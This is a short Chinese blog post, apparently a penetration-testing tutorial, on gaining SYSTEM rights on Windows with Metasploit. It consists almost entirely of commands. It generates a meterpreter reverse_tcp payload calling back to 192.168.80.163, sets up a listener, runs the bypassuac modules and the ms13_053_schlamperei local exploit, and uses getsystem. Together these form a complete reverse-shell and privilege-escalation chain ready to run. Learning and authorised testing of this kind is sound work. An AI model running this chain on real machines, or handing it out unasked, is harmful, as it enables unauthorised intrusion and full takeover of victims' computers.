绕过UAC提权,利用漏洞提权

首先建立一个session,进入后渗透测试阶段。

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b "\x00\xff" -i 7 -f exe -o /root/1.exe  首先生成一个meterpreter类型的payload

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.80.163

msf exploit(handler) > exploit


绕过UAC限制

exploit/windows/local/bypassuac 和 exploit/windows/local/bypassuac_injection

什么是UAC(用户账户控制)?,例如:

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp

msf exploit(bypassuac) > set lhost 192.168.80.163

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

meterpreter > getsystem  绕过UAC获取system权限


利用windows系统漏洞提权到system

exploit/windows/local/ms13_053_schlamperei

exploit/windows/local/ms13_081_track_popup_menu

exploit/windows/local/ms13_097_ie_registry_symlink

exploit/windows/local/ppr_flatten_rec

msf > use exploit/windows/local/ms13_053_schlamperei

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp

msf exploit(ms13_053_schlamperei) > set lhost 192.168.80.163

msf exploit(ms13_053_schlamperei) > exploit

meterpreter > getsystem  提权到system用户

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 一、MSF终端命令 show exploits 列出metasploit框架中所有的渗透攻击模块 show pay...
    Kaen阅读 8,585评论 0 1
  • 前言 提权何须收集各种EXP,一个MSF就够了,本文为大家带来MSF综合提权的一些姿势。 文章内容: 学习`Met...
    钦玄阅读 12,966评论 1 9
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 6,325评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 13,530评论 2 22
  • 同人产生摩擦,对我来说,特别是亲密相处之人,是致命伤,是一种不能言喻的感触之痛,我的情绪被无限放大,昏暗天,寒冷夜...
    程程城阅读 2,187评论 0 0